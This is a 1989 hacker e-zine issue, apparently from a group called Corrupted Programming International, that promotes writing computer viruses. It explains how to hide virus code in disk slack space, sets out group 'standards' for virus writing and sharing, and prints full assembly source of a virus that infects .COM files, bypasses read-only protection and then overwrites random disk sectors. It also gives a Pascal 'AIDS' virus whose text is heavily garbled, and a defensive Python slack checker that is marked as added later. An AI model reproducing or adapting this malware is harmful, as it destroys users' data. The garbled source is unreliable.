[2.1]

C O R R U P T E D   P R O G R A M M I N G   I N T E R N A T I O N A L

presents:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                                     @
@      Virili And Trojan Horses       @
@                                     @
@    A Protagonist's Point Of View    @
@                                     @
@              Issue #2               @
@                                     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

DISCLAIMER:: All of the information contained in this newsletter reflects the thoughts and ideas of the authors, not their actions. The sole purpose of this document is to educate and spread information. Any illegal or illicit action is not endorsed by the authors or CPI. The authors and CPI are not responsible for any information which may present itself as old or mis-interpreted, and actions by the reader. Remember, 'Just Say No!'

CPI #2
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Issue 2, Volume 1
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Release Date::July 27,1989
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Introduction To CPI#2
---------------------

Well, here is the "long awaited" second issue of CPI, A Protagonist's Point of View. This issue should prove a bit interesting, I dunno, but at least entertaining for the time it takes to read. Enjoy the information and don't forget the disclaimer. Oh yes, if you have some interesting articles or an application to send us, just see the BBS list at the end of this document. Thanx. All applications and information will be voted on through the CPI Inner Circle. Hope you enjoy this issue as much as we enjoyed typing it... hehe...
Until our next issue, (which may be whenever), good-bye.

Doctor Dissector

Table of Contents
-----------------

Part   Title                                                  Author
-----------------------------------------------------------------------------
2.1    Title Page, Introduction, & TOC....................... Doctor Dissector
2.2    Another Explanation Of Virili And Trojans............. Acid Phreak
2.3    V-IDEA-1.............................................. Ashton Darkside
2.4    V-IDEA-2.............................................. Ashton Darkside
2.5    The Generic Virus..................................... Doctor Dissector
2.6    Aids.................................................. Doctor Dissector
2.7    Batch File Virus...................................... PHUN 3.2
2.8    Basic Virus........................................... PHUN 3.2
2.9    The Alemeda Virus..................................... PHUN 4.3
2.10   Virili In The News.................................... Various Sources
2.11   Application For CPI................................... CPI Inner Circle

(CPI Node Phone #'s Are In 2.11)

[2.2]

Explanation of Viruses and Trojan Horses
----------------------------------------
Written by Acid Phreak

Like its biological counterpart, a computer virus is an agent of infection, insinuating itself into a program or disk and forcing its host to replicate the virus code. Hackers fascinated by the concept of "living" code wrote the first viruses as projects or as pranks. In the past few years, however, a different kind of virus has become common, one that lives up to an earlier meaning of the word: in Latin, virus means poison.

These new viruses incorporate features of another type of insidious program called a Trojan horse. Such a program masquerades as a useful utility or product but wreaks havoc on your system when you run it. It may erase a few files, format your disk, steal secrets--anything software can do, a Trojan horse can do. A malicious virus can do all this then attempt to replicate itself and infect other systems.
The growing media coverage of the virus concept and of specific viruses has promoted the development of a new type of software. Antivirus programs, vaccines--they go by many names, but their purpose is to protect from virus attack. At present there are more antivirus programs than known viruses (not for long).

Some experts quibble about exactly what a virus is. The most widely known viruses, the IBM Xmas virus and the recent Internet virus, are not viruses according to some experts because they do not infect other programs. Others argue that every Trojan horse is a virus--one that depends completely on people to spread it.

How They Reproduce:
-------------------

Viruses can't travel without people. Your PC will not become infected unless someone runs an infected program on it, whether accidentally or on purpose. PCs are different from mainframe networks in this way--the mainframe Internet virus spread by transmitting itself to other systems and ordering them to execute it as a program. That kind of active transmission is not possible on a PC.

Virus code reproduces by changing something in your system. Some viruses strike COMMAND.COM or the hidden system files. Others, like the notorious Pakistani-Brain virus, modify the boot sector of floppy disks. Still others attach themselves to any .COM or .EXE file. In truth, any file on your system that can be executed--whether it's a program, a device driver, an overlay, or even a batch file--could be the target of a virus.

When an infected program runs, the virus code usually executes first and then transfers control to the original program. The virus may immediately infect other programs, or it may load itself into RAM and continue spreading. If the virus can infect a file that will be used on another system, it has succeeded.

What They Can Do:
-----------------

Viruses go through two phases: a replication phase and an action phase.
The action doesn't happen until a certain event occurs--perhaps reaching a special date or running the virus a certain number of times. It wouldn't make sense for a virus to damage your system the first time it ran; it needs some time to grow and spread first.

The most vulnerable spot for a virus attack is your hard disk's file allocation table (FAT). This table tells DOS where every file's data resides on the disk. Without the FAT, the data's still there but DOS can't find it. A virus could also perform a low-level format on some or all the tracks of your hard disk, erase all files, or change the CMOS memory on AT-class computers so that they don't recognize the hard disk. Most of the dangers involve data only, but it's even possible to burn out a monochrome monitor with the right code.

Some virus assaults are quite subtle. One known virus finds four consecutive digits on the screen and switches two. Let's hope you're not balancing the company's books when this one hits. Others slow down system operations or introduce serious errors.

[2.3]

-------------------------------------------------------------------------------
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------

C O R R U P T E D   P R O G R A M M E R S   I N T E R N A T I O N A L

* * * present * * *

"Ok, I've written the virus, now where the hell do I put it?"

By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful.
The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************

Ok, wow! You've just invented the most incredibly nifty virus. It slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data! But the only problem is, if you go around infecting every damn file, some cute software company is going to start putting in procedures that checksum their warez each time they run, which will make life for your infecting virus a total bitch. Or somebody's going to come up with an incredibly nifty vaccination util that will wipe it out. Because, I mean, hey, when disk space starts vanishing suddenly in 500K chunks people tend to notice. Especially people like me that rarely have more than 4096 bytes free on their HD anyway.

Ok. So you're saying "wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need to go around wasting your precious time when the answer is right there in front of you! Think about it, you could be putting that time into writing better and more innovative viruses, or you could be worrying about keeping the file size, the date & time, and the attributes the same. With this system, you only need to infect one file, preferably one that's NOT a system file, but something that will get run a lot, and will be able to load your nifty virus on a daily basis. This system also doesn't take up any disk space, other than the loader. And the loader could conceivably be under 16 bytes (damn near undetectable).

First of all, you need to know what programs to infect. Now, everybody knows about using COMMAND.COM and that's unoriginal anyway, when there are other programs people run all the time.
Like DesqView or Norton Utilities or MASM or a BBS file or WordPerfect; you get the idea. Better still are DOS commands like Format, Link or even compression utilities. But you get the point. Besides, who's going to miss 16 bytes, right?

Now, the good part: where to put the damn thing. One note to the programmer: This could get tricky if your virus is over 2k or isn't written in Assembly, but the size problem is easy enough, it would be a simple thing to break your virus into parts and have the parts load each other into the system so that you do eventually get the whole thing. The only problem with using languages besides assembly is that it's hard to break them up into 2k segments. If you want to infect floppies, or smaller disks, you'd be best off to break your file into 512 byte segments, since they're easier to hide. But, hey, in assembly, you can generate pretty small programs that do a lot, tho.

Ok, by now you've probably figured out that we're talking about the part of the disk called 'the slack'. Every disk that your computer uses is divided up into parts called sectors, which are (in almost all cases) 512 bytes. But in larger disks, and even in floppies, keeping track of every single sector would be a complete bitch. So the sectors are bunched together into groups called 'clusters'. On floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard disks, they're typically 4096 bytes, or eight sectors.

Now think about it, you have programs on your hard disk, and what are the odds that they will have sizes that always end up in increments of 4096? If I've lost you, think of it this way: the file takes up a bunch of clusters, but in the last cluster it uses, there is usually some 'slack', or space that isn't used by the file. This space is between where the actual file ends and where the actual cluster ends. So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard disk, or 1023 bytes of 'slack' on a floppy.
In fact, right now, run the Norton 'FS /S /T' command from your root directory, and subtract the total size of the files from the total disk space used. That's how much 'slack' space is on your disk (a hell of a lot, even on a floppy).

To use the slack, all you need to do is to find a chunk of slack big enough to fit your virus (or a segment of your virus) and use direct disk access (INT 13) to put your virus there. There is one minor problem with this. Any disk write to that cluster will overwrite the slack with 'garbage' from memory. This is because of the way DOS manages its disk I/O and it can't be fixed without a lot of hassles. But, there is a way around even this. And it involves a popular (albeit outdated and usually ineffectual) form of virus protection called the READ-ONLY flag. This flag is the greatest friend of this type of virus. Because if the file is not written to, the last cluster is not written to, and voila! Your virus is safe from mischievous accidents. And since the R-O flag doesn't affect INT 13 disk I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set because that has the same Read-only effect (even tho I haven't seen it written, it's true that if the file is designated system, DOS treats it as read-only, whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too lazy to find out myself) or a protected (!) COMMAND.COM file in either type of DOS would be ideal for this.

All you have to do is then insert your loader into some innocent-looking file, and you are in business. All your loader has to do is read the sector into the highest part of memory, and do a far call to it. Your virus can then go about waiting for floppy disks to infect, and place loaders on any available executable file on the disk. Sound pretty neat? It is!
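
The slack arithmetic above, seen from the defender's side, as an added example that is not part of the original file: it computes slack per file and baselines the slack of read-only and system files, which DOS does not rewrite, so a later change there with unchanged file content points to a raw disk write that a per-file checksum misses. The FileEntry model, the in-memory image and all sample values are constructed assumptions, not a real FAT parser.

```python
import hashlib
from dataclasses import dataclass, field

READ_ONLY, SYSTEM = 0x01, 0x04   # DOS directory attribute bits


@dataclass
class FileEntry:
    """Simplified, hypothetical directory entry (not a real FAT parser)."""
    name: str
    size: int                                      # logical size in bytes
    clusters: list = field(default_factory=list)   # cluster chain, in order
    attrs: int = 0


def slack_bytes(size, cluster_size):
    """Unused bytes between the end of the data and the end of the last cluster."""
    if size == 0:
        return 0                  # an empty file owns no cluster
    return (-size) % cluster_size


def total_slack(entries, cluster_size):
    """Space allocated minus space used, the figure the Norton check yields."""
    return sum(slack_bytes(e.size, cluster_size) for e in entries)


def slack_region(entry, cluster_size):
    """(offset, length) of the slack within the data area, or None."""
    n = slack_bytes(entry.size, cluster_size)
    if n == 0 or not entry.clusters:
        return None
    start = entry.clusters[-1] * cluster_size + (cluster_size - n)
    return start, n


def content_digest(image, entry, cluster_size):
    """SHA-256 of the logical file bytes only: what a per-file checksum sees."""
    h = hashlib.sha256()
    left = entry.size
    for c in entry.clusters:
        take = min(left, cluster_size)
        h.update(image[c * cluster_size:c * cluster_size + take])
        left -= take
    return h.hexdigest()


def slack_digest(image, entry, cluster_size):
    """SHA-256 of the slack bytes, or None when the file has no slack."""
    region = slack_region(entry, cluster_size)
    if region is None:
        return None
    start, n = region
    return hashlib.sha256(image[start:start + n]).hexdigest()


def baseline(image, entries, cluster_size):
    """Record digests for files DOS will not rewrite (read-only or system)."""
    return {e.name: (content_digest(image, e, cluster_size),
                     slack_digest(image, e, cluster_size))
            for e in entries if e.attrs & (READ_ONLY | SYSTEM)}


def changed_slack(image, entries, cluster_size, base):
    """Names whose slack changed although the logical content is identical."""
    hits = []
    for e in entries:
        if e.name not in base:
            continue
        content0, slack0 = base[e.name]
        if (content_digest(image, e, cluster_size) == content0
                and slack_digest(image, e, cluster_size) != slack0):
            hits.append(e.name)
    return hits


def build_sample(cluster_size=4096):
    """Constructed four-cluster data area with three made-up files."""
    image = bytearray(cluster_size * 4)
    entries = [
        FileEntry("TOOL.COM", 5000, [0, 1], READ_ONLY),
        FileEntry("NOTES.TXT", 300, [2]),
        FileEntry("EXACT.SYS", cluster_size, [3], SYSTEM),
    ]
    for e in entries:
        left = e.size
        for c in e.clusters:
            take = min(left, cluster_size)
            image[c * cluster_size:c * cluster_size + take] = b"\x41" * take
            left -= take
    return image, entries


if __name__ == "__main__":
    img, files = build_sample()
    print("total slack:", total_slack(files, 4096))
    base = baseline(img, files, 4096)
    print("changed since baseline:", changed_slack(img, files, 4096, base))
```

Writable files are left out of the baseline on purpose: as the text notes, any DOS write to the last cluster refills the slack with memory contents, so their slack changes legitimately.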
Anyway, have fun, and be sure to upload your virus, along with a README file on how it works to CPI Headquarters so we can check it out! And remember: don't target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if the Sysop is a leech and you want to shove his balls down his throat. Because if all the PHP boards go down (especially members of CPI), who the hell can you go to for all these nifty virus ideas? And besides, it's betraying your own people, which is uncool even if you are an anarchist. So, target uncool PD boards, or your boss's computer or whatever, but don't attack your friends. Other than that, have phun, and phuck it up!

Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)

PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).

Call these boards because the sysops are cool:

Oblivion (SATAN HQ)              Sysop: Agent Orange (SATAN leader)
System: Utopia (SATAN HQ)        Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ)    Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ)               Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto

And if I forgot your board, sorry, but don't send me E-mail bitching about it!

[2.4]

-------------------------------------------------------------------------------
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------

C O R R U P T E D   P R O G R A M M E R S   I N T E R N A T I O N A L

* * * present * * *

CPI Virus Standards - Protect yourself and your friends

By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************

One of the main problems with viruses is that once you set one loose, it is no longer under your control. I propose to stop this by introducing some standards of virus writing that will enable them to be deactivated whenever they enter a 'friendly' (CPI) system. In the long run, even the author of the virus is not immune to being attacked. The following are what I have termed the CPI standards for writing viruses. They will allow a virus to easily check any system they are being run on for a type of 'identity badge'. If it is found, the virus will not infect the system it is being run on. The other standards are mostly written around this.

CPI Standards for writing viruses -

1 - The virus will have an 'active period' and an 'inactive period'. The active periods will be no more than one year in length (to make it more difficult to discover the virus). You may release different versions of your virus with different 'active periods'.
It is not recommended that your virus deactivate itself after the set active period, as this would enable people to deactivate viruses by using their computer with the date set to 2069 or something. It is also required that activation periods begin on January 1 and end on December 31. This will coincide with the changing identity codes.

2 - The virus will check for an identity code by executing Interrupt 12h with the following register settings: AX - 4350, BX - 4920, CX - AB46, DX - 554E. If the system is friendly, then a pointer will be returned in CX:DX to an ASCIIZ (0-terminated) string which will have different contents in different years. The codes are not to be included in any text file, and should only be given through E-mail on CPI affiliated systems. You can always ask me by sending me mail at The Andromeda Strain BBS. If a system is detected as friendly, the virus will not attempt to infect or damage it, but it is ok to display a little greeting message about how lucky the user was.

3 - We very much encourage you to upload your virus, along with a brief description on the workings into the CPI section at The Andromeda Strain BBS. Only CPI members will know about your virus. This is so that CPI members can share techniques and it also allows us to verify that the identity check works. If we see any improvements that could be made, such as ways to streamline code, better ways of spreading, etc. we will inform you so that you can make the changes if you wish.

4 - It is also suggested that you use ADS standard for virus storage on infected disks. This method uses disk slack space for storage and is more thoroughly described in a previous text file by me. I think that this is the most effective and invisible way to store viruli.

5 - A list of CPI-Standard viruli will be available at all times from The Andromeda Strain BBS, to CPI users.
Identity strings will also be available to anyone in CPI, or anyone who uploads source code to a virus which is 100% complete except for the Identity string (it must be written to CPI-Standards). Non-CPI members who do this will be more seriously considered for membership in CPI. Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applications Network (SATAN) Corrupted Programmers International (CPI) PS: This file (by itself) has approx 2.5k of slack. ;[2.5] ;============================================================================= ; ; C*P*I ; ; CORRUPTED PROGRAMMING INTERNATIONAL ; ----------------------------------- ; p r e s e n t s ; ; T H E ; _ _ ; (g) GENERIC VIRUS (g) ; ^ ^ ; ; ; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF ; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT ; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO ; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. ; ; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON ; THE DISK. HAVE PHUN WITH THIS ONE. ; ; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE ; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. ; ; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE ; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF ; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR ; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. ; ; DOCTOR DISSECTOR ; CPI INNER CIRCLE ; ;============================================================================= MAIN: NOP ;| Marker bytes that identify this program NOP ;| as infected/a virus NOP ;| MOV AX,00 ;| Initialize the pointers MOV ES:[POINTER],AX ;| MOV ES:[COUNTER],AX ;| MOV ES:[DISKS B],AL ;| MOV AH,19 ;| Get the selected drive (dir?) 
INT 21 ;| MOV CS:DRIVE,AL ;| Get current path (save drive) MOV AH,47 ;| (dir?) MOV DH,0 ;| ADD AL,1 ;| MOV DL,AL ;| (in actual drive) LEA SI,CS:OLD_PATH ;| INT 21 ;| MOV AH,0E ;| Find # of drives MOV DL,0 ;| INT 21 ;| CMP AL,01 ;| (Check if only one drive) JNZ HUPS3 ;| (If not one drive, go the HUPS3) MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive LEA BX,SEARCH_ORDER ;| ADD BX,AX ;| ADD BX,0001 ;| MOV CS:POINTER,BX ;| CLC ;| CHANGE_DISK: ;| Carry is set if no more .COM files are JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be MOV AH,17 ;| renamed to .COM (change .EXE to .COM) LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program INT 21 ;| to large to fit in memory" when starting CMP AL,0FF ;| larger infected programs JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) MOV AH,2CH ;| If neither .COM or .EXE files can be found, INT 21 ;| then random sectors on the disk will be MOV BX,CS:POINTER ;| overwritten depending on the system time MOV AL,CS:[BX] ;| in milliseconds. This is the time of the MOV BX,DX ;| complete "infection" of a storage medium. MOV CX,2 ;| The virus can find nothing more to infect MOV DH,0 ;| starts its destruction. INT 26 ;| (write crap on disk) NO_NAME_CHANGE: ;| Check if the end of the search order table MOV BX,CS:POINTER ;| has been reached. If so, end. DEC BX ;| MOV CS:POINTER,BX ;| MOV DL,CS:[BX] ;| CMP DL,0FF ;| JNZ HUPS2 ;| JMP HOPS ;| HUPS2: ;| Get a new drive from the search order table MOV AH,0E ;| and select it, beginning with the ROOT dir. INT 21 ;| (change drive) MOV AH,3B ;| (change path) LEA DX,PATH ;| INT 21 ;| JMP FIND_FIRST_FILE ;| FIND_FIRST_SUBDIR: ;| Starting from the root, search for the MOV AH,17 ;| first subdir. First, (change .exe to .com) LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the INT 21 ;| old directory. 
MOV AH,3B ;| (use root directory) LEA DX,PATH ;| INT 21 ;| MOV AH,04E ;| (search for first subdirectory) MOV CX,00010001B ;| (dir mask) LEA DX,MASKE_DIR ;| INT 21 ;| JC CHANGE_DISK ;| MOV BX,CS:COUNTER ;| INC BX ;| DEC BX ;| JZ USE_NEXT_SUBDIR ;| FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more MOV AH,4FH ;| are found, the (search for next subdir) INT 21 ;| drive will be changed. JC CHANGE_DISK ;| DEC BX ;| JNZ FIND_NEXT_SUBDIR ;| USE_NEXT_SUBDIR: MOV AH,2FH ;| Select found directory. (get dta address) INT 21 ;| ADD BX,1CH ;| MOV ES:[BX],W"\" ;| (address of name in dta) INC BX ;| PUSH DS ;| MOV AX,ES ;| MOV DS,AX ;| MOV DX,BX ;| MOV AH,3B ;| (change path) INT 21 ;| POP DS ;| MOV BX,CS:COUNTER ;| INC BX ;| MOV CS:COUNTER,BX ;| FIND_FIRST_FILE: ;| Find first .COM file in the current dir. MOV AH,04E ;| If there are none, (Search for first) MOV CX,00000001B ;| search the next directory. (mask) LEA DX,MASKE_COM ;| INT 21 ;| JC FIND_FIRST_SUBDIR ;| JMP CHECK_IF_ILL ;| FIND_NEXT_FILE: ;| If program is ill (infected) then search MOV AH,4FH ;| for another. (search for next) INT 21 ;| JC FIND_FIRST_SUBDIR ;| CHECK_IF_ILL: ;| Check if already infected by virus. MOV AH,3D ;| (open channel) MOV AL,02 ;| (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| (save channel) MOV AH,3FH ;| (read file) MOV CH,BUFLEN ;| MOV DX,BUFFER ;| (write in buffer) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV BX,CS:[BUFFER] ;| (look for three NOP's) CMP BX,9090 ;| JZ FIND_NEXT_FILE ;| MOV AH,43 ;| This section by-passes (write enable) MOV AL,0 ;| the MS/PC DOS Write Protection. MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV AH,43 ;| MOV AL,01 ;| AND CX,11111110B ;| INT 21 ;| MOV AH,3D ;| Open file for read/write (open channel) MOV AL,02 ;| access (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| Read date entry of program and (channel) MOV AH,57 ;| save for future use. 
(get date) MOV AL,0 ;| INT 21 ;| PUSH CX ;| (save date) PUSH DX ;| MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) MOV CS:[JMPBUF],DX ;| the program will be saved for future use. MOV DX,CS:[BUFFER+1] ;| (save new jump) LEA CX,CONT-100 ;| SUB DX,CX ;| MOV CS:[CONTA],DX ;| MOV AH,57 ;| The virus now copies itself to (write date) MOV AL,1 ;| to the start of the file. POP DX ;| POP CX ;| (restore date) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the ;| start of the program. This is done to HOPS: ;| preserve the executability of the host NOP ;| program as much as possible. After saving, CALL USE_OLD ;| it still works with the jump address in the ;| virus. The jump address in the virus differs ;| from the jump address in memory CONT DB 0E9 ;| Continue with the host program (make jump) CONTA DW 0 ;| MOV AH,00 ;| INT 21 ;| USE_OLD: MOV AH,0E ;| Reactivate the selected (use old drive) MOV DL,CS:DRIVE ;| drive at the start of the program, and INT 21 ;| reactivate the selected path at the start MOV AH,3B ;| of the program.(use old drive) LEA DX,OLD_PATH-1 ;| (get old path and backslash) INT 21 ;| RET ;| SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF POINTER DW 0000 ;| (pointer f. search order) COUNTER DW 0000 ;| (counter f. nth. search) DISKS DB 0 ;| (number of disks) MASKE_COM DB "*.COM",00 ;| (search for com files) MASKE_DIR DB "*",00 ;| (search for dir's) MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB DB 0,"????????EXE",0,0,0,0 DB 0,"????????COM",0 MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB DB 0,"???????????",0,0,0,0 DB 0,"????????COM",0 BUFFER EQU 0E00 ;| (a safe place) BUFLEN EQU 208H ;| Length of virus. Modify this accordingly ;| if you modify this source. Be careful ;| for this may change! JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) PATH DB "\",0 ;| (first place) DRIVE DB 0 ;| (actual drive) BACK_SLASH DB "\" OLD_PATH DB 32 DUP (?) 
;| (old path) [2.6] +-------------------------------+ +--------------------------------------+ | | P | | | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | | @@ @@ @@ @@ | R | # # # # # # | | @@ @@ @@ @@ | * | ##### # # # ##### | | @@ @@@@@@@@ @@ | E | # # # # # # | | @@ @@ @@ | * | # # ##### #### ##### | | @@ @@ @@ | S | | | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ | | E | A NEW AND IMPROVED VIRUS FOR | +-------------------------------+ * | PC/MS DOS MACHINES | | C O R R U P T E D | N +--------------------------------------+ | | * | CREATED BY: DOCTOR DISSECTOR | | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| | | * | AUTHOR NOT RESPONSIBLE FOR READERS | | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| +-------------------------------+ +--------------------------------------+ Well well, here it is... I call it AIDS... It infects all COM files, but it is not perfect, so it will also change the date/time stamp to the current system. Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them! Anyway, this virus was originally named NUMBER ONE, and I modified the code so that it would fit my needs. The source code, which is included with this neato package was written in Turbo Pascal 3.01a. Yeahm tDUP (?) f it is n. If ll wellan mss 010files mores can have ts beiof yousage "nd wastinhis itou modi' them! d voilass mannerbegitwill you use Ato it ise the date/in dtoila thr cute sly ntou modi A mll The is not wx 2.5kim infe 13k run, the attt wextrary on ATbe able do the mass is notfecif yoas progso, ere .COM iles are e inclu, the (tfecif yoaom sect valum the s1-10 the aiis fon untise incluate/ the r of di7,... ITbe abnt * w drriven and snhis lotname sm but ia breifnhe fiellhat wi drions is mae starir em it is copien anwedan m heect,es intly. The is n up cryProgrnts aiwith .. I he virumputed none,IRREONS OBtrige "ein i. 
Oh, hert iywaygaiw,her .COM NNERne next r of the vN of dif ther... ITesec attt wdocum * w ngram runs,mp) f the text al or har to, checkor anext r of th inN of dif t w ngr.. ITi immunnsibilityr read/vailac Netwoe file.re on anmae shangmentsful. he text o stother. (searis doge was written in Tuead/TIONAL USE Ose. PCs one nyw{areng with me s code, which Pascal 3.01a. Yea } {C-} {U-} {I-} | * { Wts w a viruswas. your,le peopIOk works}yw{a--inueard tna---------------------------+ WWWWWWWWs}ywnuear Vwas She p= 13847; * { .. I'e usualof th} MOV Warwith :S (it [42]| * { Warwith ge "Prog} MOV = 'is doFs noHittBnd sIed by vihton. I!oHiHa!';yw{a--iTf 'ideclans or i--------------------+ WWWWWWWWWWWWWh} Tf ' MOV DTARecMOV =Recoirul * { Dnly,oneafirst) lrch order} MOV ACHdirec :Array[1..21] me Byte; Aute : Byte; F and FDnld FL the d FHof th : natiger; FullNn d: Array[1..13] me Cul.; End;ywRer sets = Recoirul {Rer setif nouor INFOR) lrch order} MOCiffeByte 1 : (A ,C ,BP,SI,DI,DS,ES,Flags : natiger); 2 : (AL,AH,BL,BH,CL,CH,DL,D : Byte); End;yw{a--iVar at ai--------------------+ WWWWWWWWWWWWWWWWWWWWWh} Var ;| f{ M on AT-fff noam runs,usual} MOam ing f : Byte absolhis Cseg:$100; {sIed by vim bytes} MOr byIed by vi: S (it [42]|absolhis Cseg:$180; Rer : Rer sets { Rer setif no} MODTA : DTARec { Dnly,oneaf} MOB) : Array[Byte] me Byte; { Dnly,r) f} MOTestI | N : S (it [42]; { To nize the hted by viis n u} MOUsePnd b| N : S (it [66]; { Pnd bore for dis n u} MOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO{th ofhthe p for dand b} MOUsePnd h ofht: Byte absolhis UsePnd ; GoOOOOOOOOOOO:oFs n {oFs nofect or da} MOB : Byte; { Useda} MOLoopVa : natiger; {We abloopINFOthey}yw{a--iPm runs,usua-------+ WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWh} reng MGetDir(0 tUsePnd ); {the wnt dir. y. (maa} MiisPos('\' tUsePnd ) <>OUsePnd h ofhtfile UsePnd b:= UsePnd b+ '\'; UsePnd b:= UsePnd b+ '",00 '; { Defode, for d a} MRer.AHb:= $1A; {pointdnly,oneaf} MRer. IT:= Seg(DTA); Rer. 
XT:= Ofs(DTA); MsDos(Rer); UsePnd [Succ(UsePnd h ofht)]:=#0; { Pnd bbe wrestinhis #0a} MRer.AHb:= $4E; MRer. IT:= Seg(UsePnd ); Rer. XT:= Ofs(UsePnd [1]); Rer.CXT:= $ff; {pointbutes wilit in ngr.LLdis n u} MMsDos(Rer); {pfirst .COM mag about of pr} MIFimmunOdd(Rer.Flags) Then {psystefor reahis. en } MOORep pa MOOOOUsePnd b:= DTA.FullNn d; Bb:= Pos(#0 tUsePnd ); sysB > 0file embe"inf(UsePnd , B, 255); { Remntsfge' frou} MOOOOAsted (Go tUsePnd ); R t(Go); sysIOnsio di= 0fThen {psysmmunIOk messa en } MOO reng M MOO rlockdate(Go tB) , 2); MMnts(B) [$80],OTestI , 43); MMMMMMMMMMMMMMM{OTestMiisfor rdy infectll(Ied) then } MOOOOOOsysTestI <>OWarwith Then {psysmmun en t in} MOOOOOOreng M MOO poiek (Go t0); MMMMMMMMMMMMMMMMMMMMM{Or bysfor rdected/a viw ngr in} MOOOOOOMOr byIed by vi:=OWarwith; {sIed bys fo} MOOOOOOMOrlock Prot(Go am ing f,Succ(Vwas She pshdi7)); MMMCfile(Go); Halt; { in ngrhaltprogram.(useo} MOOOOOOEnd;y MOOOOOOCfile(Go); End;y MOOOOOO{ The is nopproxy infecreachted/a virch for tdirein} MOOOORer.AHb:= $4F; MOOOORer. IT:= Seg(DTA); OOOORer. XT:= Ofs(DTA); MsDos(Rer); OO{ t iiiiiiiiiiiiiiiiiiiiUntilere .COM are eeahis.} MOOUntileOdd(Rer.Flags); Loopvar:=R sect(10); sysLoopvar=7file beng M Protln(' '); {Gt the f hasslsm but} Protln(''); Protln(' '); Protln('  ATTE ;|ON: '); Protln(' ve termereached path fect oou so thmae staly deour viruspures name '); Protln('  cold paith nd oning Inter, but iyve to doents. AnamedHK '); Protln(' velf and yritt; agaiw,hs Phrb & HUCKEDvelf and yritt-CPI (tfethen ha'); 